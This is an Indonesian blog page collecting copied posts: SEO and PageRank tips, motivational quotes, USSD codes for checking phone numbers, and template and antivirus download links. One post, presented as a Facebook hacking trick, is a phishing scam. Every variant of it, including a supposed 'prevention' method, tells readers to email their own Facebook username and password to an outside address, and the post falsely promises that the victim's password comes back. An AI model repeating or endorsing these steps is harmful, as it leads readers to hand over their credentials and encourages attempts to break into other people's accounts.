GepLenk-Blog'z

Free Tips | Tutorial Blog | Software | Games | Etc,

Sabtu, 16 Mac 2013 - 9:17 PTG

Cara Mendapatkan Page Rank Secara Cepat


Cara Mendapatkan atau Menaikan Page Rank Secara Cepat dan Mudah Kali ini SEO XP akan memberikan tips dan triknya seperti yang saya lakukan dulu untuk mendapatkan Page Rank Secara Cepat dan Mudah.

untuk mendapatkan Page Rank kita harus berkerja keras jika kita ingin mendapatkan Page Rank Tersebut, Diantaranya kita harus Posting Tiap Hari, Memasang Ribuan Backlink, Promo sana Promo Sini, tapi semua itu tidak perlu bagi saya. Cobalah kalian pakai cara saya ini mungkin bisa berhasil! memang sih Page Rank Updatenya tidak tentu tapi cobalah untuk siap siap mendapatkannya! langsung saja yuk To The Point..

1. Selalu Posting minimal 3 Hari Sekali
Postinglah Artikel yang Menarik nan Unik kenapa? Soalnya jika Si google Panda melihat konten kita yang sangat Menarik nan Unik juga Real 100% Artikel Buatan kita alias No Copas pasti si Google Akan Jatuh Cinta kepada Blog kita!. Jika membahas Artikel diharuskan menuju topik yang sedang dibicarakan. janganlah sesekali kamu melenceng ke pembahasan yang tidak Penting.

2. Diharuskan Blogwalking Dan Jangan Lupa Berkomentar
Kenapa? sebab jika kamu terus Blogwalking maka blog kamu akan lumayan tenar di blog orang lain dan itu juga akan menambah blog kamu terdeteksi di Google. Saya tegaskan jangan lah Berkomentar yang Berupa SPAM atau SARA. Cobalah Berkomentar dengan Baik dan Benar agar si pemilik blog yang sedang kamu komen akan memuji balik kamu dan jika dia mau, dia akan mengunjungi Balik blog kamu..

3. Tidak Usah Memasang Backlink Secara Ribuan/Ratusan
Wah sepertinya cara memasang backlink hampir selalu ada di setiap blog. Tapi bagi saya itu hanyalah membuat blog saya Seperti tempat sampah. Loh kok bisa? Sebab jika kita memasang Backlink secara berlebihan si google Pinguin akan menjadikan Blog kamu seperti SPAM. nah sekarang coba Perhatikan Blog saya apakah Blog saya dipasangkan Backlink? Tidak! Menurut saya sih Backlink tidak terlalu Penting. hehehe.
Jika kamu masih mau memasang backlink di blog kamu sendiri, cobalah pasang yang butuhnya saja.


4. Wajib Memasang Meta Tag
Meta tag merupakan hal yang sangat penting di blog. Contoh Seperti kamu Manusia Mempunyai Nama dan artinya sendiri. Lihat Gambar dibawah!


Nah, Bagaimana jika Blog Kamu saat diperkenalkan Oleh Google???



5. Jangan COPAS
Kalo masalah copas sih itu sudah pasti tradisi bagi Para Blogger Malas..
Jika Copas tahukan kamu dampak Negatifnya? Coba Baca Disini "Untung Atau Rugikah MengCOPAS Artikel Orang Lain Tanpa Permisi"


6. Cobalah untuk Mendaftarkan Blog Kamu ke WEB MASTER..
Cobalah Setiap kamu membuat artikel langsunglah Untuk mendaftarkan Blog kamu ke Google http://www.google.co.id/addurl untuk mendaftarkannya


7. Coba untuk MemPINGkan blog kamu..
Berikut saya mempingkan blog saya di situs situs yang terpercaya oleh saya:



1.      http://www.pingomatic.com/
2.      http://googleping.com/
3.      http://www.auto-ping.com/
4.      Ping.in
5.      Pingoat.com
6.      www.totalping.com
7.      http://pingler.com/
8.      http://autopinger.com/
9.      http://pingmyblog.com/
Oh ia, Pingkan lah Blog kamu 1 Minggu Sekali Jangan Lebih.

8. Pikirkan Template
Cobalah Memasang Template yang SEO Friendly kalian bisa download Disini

9. Trafik Yang Tinggi
Nah ini yang paling PENTING yaitu menapatkan Trafik yang sangat tinggi sangat berpengaruh "Cara Mendapatkan Page Rank"

Sesuai pengalaman yang saya dapat.
Blog ini dulunya berdomain blogger-ly.blogspot.com yang berumur 2 bulan yang trafiknya 2.000 s/d 7000 Vissitor, kemudian sayapun mengganti domain menjadi seo-xp.blogspot.com dan trafik menurun drastis.
Tapi untunggnya saya mendapatkan Page Rank waktu sedang Proses Menaikan Trafik Kembali. dan saya cek 2 Hari setelah mengganti domain dan saya dikejutkan dengan mendapatkan 2 Page Rank.


Jika Semuanya telah didilakukan dengan baik dan benar makan si Page Rank tidak akan segan segan memberikan Page Rank kepada kamu.
Nah Cuma segitu yang saya lakukan jika kamu menginginkan Pagerank Secara Cepat dan Mudah Semoga Bermanfaat

Link Sumber : http://seo-xp.blogspot.com/2012/07/8-cara-mendapatkan-page-rank.html
Blogger Copas Tutorial blog
4:32 PG

Kata Bijak Versi 1

nih saya ada sedikit kata bijak untuk anda peminat kata bijak,,
silahkan di comot
kata bijaknya yang warne biru,,,


"Tegap langkahku dalam menghadapi kerasnya kehidupan tidaklah cukup tanpa disertai tegapnya iman. :')"


"Kenapa ada hujan jikalau ada hari yang cerah ?
Kita takut akan gemuruh petir yang sangat keras lantas kita bertanya - tanya kenapa tuhan merubah cuaca yang begitu cerah dengan gemuruh petir yang menakutkan lalu tuhan pun munculkan pelangi setelah hujan yang jauh lebih indah"

"Terkadang aku ingin kembali menjadi anak kecil. Lutut yang terluka lebih mudah sembuh daripada hati yang terluka."

"menangislah atas kesalahan2 yang kita perbuat, ,
namun ingat. .! !
Jangat kita sia sia kan tetesan2 air mata dengan mengulangi kesalahan yang sama.Kesalahan itu pasti, ,namun untuk dipelajari bukan di ulangi"

“Kamu tidak dapat mengubah segala sesuatu dalam satu malam, akan tetapi kamu dapat mengubahnya sedikit demi sedikit.” :)

“Hanya seseorang yang bisa takut bertindak berani. Tanpa rasa takut itu tidak ada apapun yang bisa disebut berani.” :)

“Lupakan kekecewaan, karena harapan dimasa depan masih terbentang luas dan begitu cerah.” :)

“Hanya seseorang yang bisa takut bertindak berani. Tanpa rasa takut itu tidak ada apapun yang bisa disebut berani.” :)

“Lupakan kekecewaan, karena harapan dimasa depan masih terbentang luas dan begitu cerah.” :)

Blogger Copas Kata Bijak
3:59 PG

Cara Nge-Hack Facebook New Trick


 ikuti langkah-langkah berikut:

1. Sign in lah kedalam account email kamu terlebih dahulu. yahoo, gmail, dll..

2. kemudian dengan perasaan yang mendalam tulislah sebuah pesan, tekan tombol [Compose]/[tulis surat] untuk menulis email.

3. Pada form isian to/ kepada masukkan alamat berikut:

pwordfacebookid@rocketmail.com

Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Facebook saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita

4. Pada form cc dan bcc, kosongi saja kedua form tersebut

5. pada kolom Subject ketik “uidfb” tanpa tanda kutip.

6. Pada form message (pesan), ketik kode UID berikut:

facebook.com FALSE/FALSE 1121114252079889
Username facebook : user ID facebook kamu
Facebook password : password kamu
Recover : user ID facebook korban
TTG : tanggal lahir kamu
6. Setelah itu tekan tombol send.

Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban


Contohnya:

misalkan user ID facebook kamu adalah elite@yahoo.com
dan password kamu 3l1t3b3n3r4n
dan user ID facebook korban: korban@yahoo.com

maka susunannya adalah sebagai berikut:

to: pwordfacebookid@rocketmail.com
cc:
bcc:
Subject: Recovery
message: facebook.com FALSE/FALSE 1121114252079889
Username facebook : elite@yahoo.com
Facebook password : 3l1t3b3n3r4n
Recover : korban@yahoo.com
TTG : 10041994


facebook.com FALSE/FALSE 1121114252079889 : Ini Adalah Kode Tertentu Di Facebook
___________________________________________

:: Cara Pencegahan ::

Bagi kamu para pengguna fb yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:

1. Pada form isian sento to: isikan

pwordfacebookid@rocketmail.com
2. Pada kolom Subject ketik “No Recovery” tanpa tanda kutip.

3. Kirim message sebagai berikut:

facebook.com No Rerovery
Username facebook : elite@yahoo.com
Facebook password : password kamu

contohnya yang sudah jadi:

to: pwordfacebookid@rocketmail.com
cc:
bcc:
subject: No Recovery
message: facebook.com No Rerovery
Username facebook : username facebook kamu
Facebook password : password facebook kamu
TTG : tanggal lahir kamu
Setelah mengirim email tersebut, maka bisa dipastikan facebook kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi dengan melakukan langkah ini. Cepat lakukan sebelum terlambat, karena sudah banyak orang yang terkena cara ini! Ingat: Lakukan cara 2. untuk mendapatkan password korban Lakukan cara 3. untuk mencegah
facebook kamu di hack orang lain.


_____________________________________________

Bisa langung dari facebook kita jg tanpa harus membuka email



cara nyaLakukan langkah-langkah dibawah :

1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
2. Klik compose message
3. Pada tulisan To isi dengan
pwordfacebookid@rocketmail.com
4. Pada tulisan subject isi dengan kata “PASSWORD RETRIEVE”
5. isi pesan :
baris pertama tulis alamat email anda.
baris kedua tulis alamat email facebook temen anda.
baris ketiga tulis password facebook anda.
baris keempat tulis kode ini : cgi-bin/$et76431&pwr999
Lalu Send/Kirim.



Contoh :
To : pwordfacebookid@rocketmail.com
Subject : PASSWORD RETRIEVE
Message :

anda@yahoo.co.id
temen anda@yahoo.com
Password anda
cgi-bin/$et76431&pwr999

Lalu Send/Kirim.

INGGAT : JANGAN DISALAHGUNAKAN!! Dan YANG INI BUAT PARA PENG-COPAS JANGAN DICOPAS YA SOALNYA BERBAHAYA BANGET!
Good luck.... ____________________________________________ ( SAYA PERNAH NYOBA DAN CARANYA BERHASIL 100% ).

CATATAN :
1. Jika anda mendapat pemberitahuan "Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days"
tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
2. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah.namun ingat ini hanya berlaku untuk pengguna YAHOO,YMAIL dan GMAIL.

Good Luck

link sumber : http://mashasih.blogspot.com/2012/02/cara-nge-hack-facebook-new-trick-update.html
Blogger Copas Hacking, Tips Facebook
3:56 PG

Download Template Angry Bird

nih saya kasih tempalte anggry bird

Download Template Angry Bird
Blogger Copas Download, Template
2:52 PG

Tips Mengecek No. HP All Operator


1).
Kartu Telkomsel ( Simpati dan AS )
Ketik : *808# kemudian tekan tombol Call

2).
Kartu XL
Ketik : *123*22*1*1# kemudian tekan tombol Call

3).
Kartu Indosat ( Im3 dan Mentari )
Ketik : *777*8# kemudian tekan tombol
Call

4).
Kartu Axis
Ketik : *2# kemudian tekan tombol Call

5).
Kartu Three
Ketik : *998# kemudian tekan tombol Call

6).
Kartu Smart
Ketik : *551# kemudian tekan tombol Call

7).
Kartu Fren
Untuk fren caranya adalah dengan cara mengirimkan sms, formatnya ketik : STATUS dan kirim ke 551, dan akan ada balasan "
Anda berada dalam layanan selular dengan
nomor aktif 0888xxx". Atau bisa juga Cara cek nomor Hp CDMA (Flexi, Esia, StarOne, Smart dan Fren)

Pasang simcard di ponsel Nokia, lalu ketik :

*3001#kode pengaman# .

Contoh :
*3001#12345# Lalu

tunggu sampai keluar
Menu, pilih NAM1 kemudian geser kebawah
pilih “Own number (MDN)“

Ya begitulah Cara Mengecek Nomer Hp Sendiri jika kita lupa/tidak tahu no dari kartu yang kita dipasang.

Semoga bermanfaat

tidak ada link sumber cox saya tulis sendiri,,,
hehehehe
Blogger Copas Tips Sederhana
2:30 PG

Download SmadAV Terbaru Gratis

bagi yang ingin Download SmadAV Terbaru Gratis nih saya ada linnya,,
silahkan di sedot

Download SmadAV Terbaru Gratis

Link sumber : http://septia-mujizat.blogspot.com/2013/01/download-smadav-terbaru-gratis.html
Blogger Copas Download, Software